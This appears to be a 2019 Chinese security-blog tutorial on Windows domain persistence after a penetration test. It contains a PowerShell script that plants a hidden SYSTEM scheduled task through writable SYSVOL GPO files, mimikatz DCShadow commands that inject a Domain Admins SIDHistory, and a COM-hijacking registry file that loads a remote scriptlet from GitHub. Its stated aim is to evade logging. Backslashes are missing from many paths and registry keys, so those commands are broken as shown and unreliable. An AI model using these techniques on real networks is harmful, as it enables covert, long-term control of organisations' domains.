Windows 下的权限维持

阅读量506851

|评论2

|

发布时间 : 2019-02-28 14:30:26

 

0x00 前言

在完成一个前期的渗透测试,获取到最高权限过后,后面最主要的任务就是,对目标的权限维持,方便对目标的持续性控制。本文就简单介绍几种常用的权限维持的方法。

 

0x01 GPO

GPO介绍:组策略保存为组策略对象(GPO),然后将其与Active Directory对象(如站点,域或组织单位(OU))相关联。组策略可以包括安全选项,注册表项,软件安装,启动和关闭脚本以及域成员刷新组策略设置(默认情况下每隔90分钟一次)(域控制器为5分钟)。这意味着组策略在目标计算机上强制执行配置的设置。在大多数Active Directory实现中,在域上至少配置了一个GPO,用于定义强制密码,Kerberos和域范围策略;至少一个为域控制器OU配置的GPO;至少为服务器和工作站OU配置了一个GPO。这两个GPO的名称都一样,但是ObjectID是不一样的。

所以我们可以给一个普通域用户赋予DC的sysvol完全控制权限,修改文件做到命令执行的效果,以此来达到权限维持。

先给普通用户加给权限:

icacls C:WindowsSYSVOLsysvolhack.com /grant lemo:"(OI)(CI)(F)" /t

我这里使用powershell把文件复制到上面,使用默认有的domain policy,修改ScheduledTasks.xml是不会执行的:

假设原来域中就有执行计划任务的GPO(这里可以使用powerview里面的New-GPOImmediateTask来创建),我们再来修改这个文件,重启或者等90分钟就可以执行其中的计划任务命令了:

powershell代码:

<#
icacls C:WindowsSYSVOLsysvoltest.com /grant test1:"(OI)(CI)(F)" /t
icacls C:WindowsSYSVOLsysvoltest.com /remove test1 /t
#>

function Set-ScheduleXml{
        [CmdletBinding()]

    Param (
        [Parameter(Mandatory = $True)]
        [String]
        [ValidateNotNullOrEmpty()]
        $GpoTaskXMLPath,

        [String]
        [ValidateNotNullOrEmpty()]
        $Cmd
    )

    $schedulexml = '<?xml version="1.0" encoding="utf-8"?><ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}"><ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="Debugging" image="0" changed="2019-01-20 06:02:04" uid="{9ccbe17e-5c25-4c68-a010-93f0420512ba}" userContext="0" removePolicy="0"><Properties action="C" name="Debugging" runAs="NT AUTHORITYSystem" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>NT AUTHORITYSystem</Author><Description></Description></RegistrationInfo><Principals><Principal id="Author"><UserId>NT AUTHORITYSystem</UserId><RunLevel>HighestAvailable</RunLevel><LogonType>InteractiveToken</LogonType></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><AllowStartOnDemand>false</AllowStartOnDemand><Enabled>true</Enabled><Hidden>true</Hidden><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter><RestartOnFailure><Interval>PT15M</Interval><Count>3</Count></RestartOnFailure></Settings><Actions Context="Author"><Exec><Command>powershell</Command><Arguments>-c "powershellcmd"</Arguments></Exec></Actions><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers></Task></Properties></ImmediateTaskV2></ScheduledTasks>'
    $schedulexml = $schedulexml.Replace('powershellcmd', $cmd)

    $TaskXMLPath = $GpoTaskXMLPath + '/ScheduledTasks.xml'  
    $schedulexml | Set-Content -Encoding ASCII -Path $TaskXMLPath
}

 Set-ScheduleXml -GpoTaskXMLPath '\hackdcSYSVOLhack.comPolicies{595D4D1F-5018-413D-8177-DE7089C40117}UserPreferencesScheduledTasks' -Cmd 'ipconfig /all|out-file c:tempnew.txt'

 

0x02 用户对象属性

通过修改dcshadow的方式修改SIDHistory,所控制的windows必须关闭防火墙:

lsadump::dcshadow /object:lemo /attribute:sidhistory /value:S-1-5-21-1863527717-1245757989-2975568438-500
lsadump::dcshadow /push

修改之后的lemo用户属性:

Primarygroupid:

先移除sidhistory:
Set-ADUser -Identity lemo -Remove @{SIDHistory='S-1-5-21-1863527717-1245757989-2975568438-500'}
lsadump::dcshadow /object:lemo /attribute:primarygroupid /value:512
lsadump::dcshadow /push

 

0x03 COM劫持

什么是COM对象:COM(组件对象模型)被Microsoft描述为“独立于平台,分布式,面向对象的系统,用于创建可以交互的二进制组件”。 该技术的目的是提供一个接口,允许开发人员控制和操纵其他应用程序的对象。 每个COM对象都由一个名为CLSID的唯一ID定义。 例如,用于创建Internet Explorer实例的CLSID是{0002DF01-0000-0000-C000-000000000046}。大多数COM类都在操作系统中注册,并由表示注册表中的类标识符(CLSID)的GUID标识(通常在HKCR CLSID或HKCU Software Classes CLSID,HKLMSOFTWAREClassesCLSID下)。

列出当前所有的COM对象:

这里还有各种系统的常见COM对象:

https://github.com/ohpe/juicy-potato/tree/master/CLSID

关于clsid中键值的意义:http://www.cnblogs.com/developersupport/archive/2013/06/02/COM-registry.html

在COM类的实现背后是在CLSID下的注册表项中LocalServer32键表示可执行(exe)文件的路径,InprocServer32键表示动态链接库(DLL)文件的路径,并且HKCU中的CLSID值优先于HKLM中的CLSID。所以利用下面这个reg文件注册一个COM对象:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USERSoftwareClassesScripting.Dictionary]
@=""

[HKEY_CURRENT_USERSoftwareClassesScripting.DictionaryCLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"


[HKEY_CURRENT_USERSoftwareClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"

[HKEY_CURRENT_USERSoftwareClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}InprocServer32]
@="C:\WINDOWS\system32\scrobj.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USERSoftwareClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}ProgID]
@="Scripting.Dictionary"

[HKEY_CURRENT_USERSoftwareClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}ScriptletURL]
@="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"

[HKEY_CURRENT_USERSoftwareClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}VersionIndependentProgID]
@="Scripting.Dictionary"

实际渗透中可以自己创建一个COM对象,但一般都是寻找到机器上一个可用的COM对象或者直接修改已有的对象。然后找到一个COM调用的DLL文件是不存在的,然后放入自己的DLL文件,每次调用那个COM时,你的DLL就会执行。判断文件是否存在:

$inproc = gwmi Win32_COMSetting | ?{ $_.LocalServer32 -ne $null }
$LocalServer32paths = $inproc | ForEach {$_.LocalServer32} 
foreach ($p in $LocalServer32paths){$p;cmd /c dir $p > $null}

$InprocServer32paths = $inproc | ForEach {$_.InprocServer32}
foreach ($pi in $InprocServer32paths){$pi;cmd /c dir $pi > $null}

COM组件也用来做其他的事比如UAC的绕过等,可以看三好学生的Use-COM-objects-to-bypass-UAC 。或者是使用windows的库文件:Abusing Windows Library Files for Persistence第一百一十三课:COM%20Hijacking.pdf

 

0x04 总结

​ 还有一些方法就没有介绍了,例如黄金票据和白银票据,修改注册表,GPO的ACL等,本文就只是大致介绍几种方法,没有介绍关于利用安装的应用程序,例如exchange,office等软件这些的权限维持方法,或者关于域下的方法,利用约束性委派,修改DACL的方式等。当然权限维持的目标都是利用白名单,尽量少被记录日志。可以再推荐大家看下hexacorn的how-to-find-new-persistence-tricksbeyond-good-ol-run-key-part-32beyond-good-ol-run-key-part-28

本文由anw2原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/171528

安全客 - 有思想的安全新媒体

分享到:微信
+18赞
收藏
anw2
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66